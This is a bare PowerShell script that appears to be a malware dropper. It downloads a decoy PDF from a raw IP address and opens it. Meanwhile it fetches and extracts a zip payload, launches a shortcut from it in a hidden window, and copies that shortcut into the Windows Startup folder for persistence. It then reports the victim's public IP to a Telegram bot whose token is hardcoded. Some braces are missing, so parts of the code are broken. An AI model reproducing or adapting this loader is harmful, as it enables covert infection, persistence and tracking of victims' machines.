$serverUrl = "http://104.245.241.157/documents/files/zip"
$pdfFileName = "devops.pdf"
$zipFileName = "KursorResourcesV2.zip"
$tempPath = "$env:TEMP"
$pythonFolder = Join-Path -Path $tempPath -ChildPath "KursorResourcesV2"
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
$pdfWebClient = New-Object System.Net.WebClient
$zipWebClient = New-Object System.Net.WebClient
$pdfLocalPath = Join-Path -Path $tempPath -ChildPath $pdfFileName
$pdfWebClient.DownloadFileAsync("$serverUrl/$pdfFileName", $pdfLocalPath)
$zipLocalPath = Join-Path -Path $tempPath -ChildPath $zipFileName
$zipWebClient.DownloadFile("$serverUrl/$zipFileName", $zipLocalPath)
while ($pdfWebClient.IsBusy) {
Start-Sleep -Milliseconds 500
if (Test-Path $pdfLocalPath) {
Start-Process "msedge.exe" -ArgumentList $pdfLocalPath
if (Test-Path $zipLocalPath) {
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipLocalPath, $tempPath)
$pythonwLnkPath = Join-Path -Path $pythonFolder -ChildPath "KursorResourcesV2.lnk"
while (-not (Test-Path $pythonwLnkPath)) {
Start-Sleep -Seconds 31
if (Test-Path $pythonwLnkPath) {
Start-Process $pythonwLnkPath -WindowStyle Hidden
$startupLnkPath = Join-Path -Path $startupFolder -ChildPath "KursorResourcesV2.lnk"
Copy-Item $pythonwLnkPath -Destination $startupLnkPath -Force
#
ip-api.com
$ipInfo = Invoke-RestMethod -Uri "http://ip-api.com/json"
$ipAddress = $ipInfo.query
#
Telegram
$telegramToken = "7293583526:AAF_soXXgp4ki0YC6ymuab04Fi4N_BQizwM" #
$chatId = "-4775435063" #
$message = "The script was executed to the end, launched from IP: $ipAddress"
#
Telegram
$telegramUrl = "https://api.telegram.org/bot$telegramToken/sendMessage"
Invoke-RestMethod -Uri $telegramUrl -Method Post -Body @{
chat_id = $chatId
text = $message
catch {}
finally {
$pdfWebClient.Dispose()
$zipWebClient.Dispose()